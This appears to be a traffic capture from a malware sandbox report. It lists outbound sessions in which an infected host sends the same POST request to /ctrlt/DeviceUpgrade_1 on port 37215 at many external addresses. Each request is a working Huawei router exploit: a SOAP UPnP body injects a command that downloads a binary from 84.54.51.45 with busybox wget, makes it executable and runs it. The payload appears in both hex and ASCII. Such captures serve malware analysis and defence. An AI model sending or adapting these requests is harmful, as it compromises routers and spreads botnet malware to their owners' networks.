2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            387192.168.2.1549712197.104.87.5237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782327890 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            388192.168.2.1548268197.69.98.10637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782346010 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            389192.168.2.1560352197.50.0.22137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782377958 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            390192.168.2.1548538197.147.215.7137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782407999 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            391192.168.2.1551180197.107.198.12137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782434940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            392192.168.2.1557968197.236.222.15637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782449961 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            393192.168.2.1544044197.74.219.8637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782474041 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            394192.168.2.1541452197.127.239.4937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782499075 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            395192.168.2.1547924197.88.101.23837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782526016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            396192.168.2.1547644197.27.193.14237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782558918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            397192.168.2.1543802197.165.161.4037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782582998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
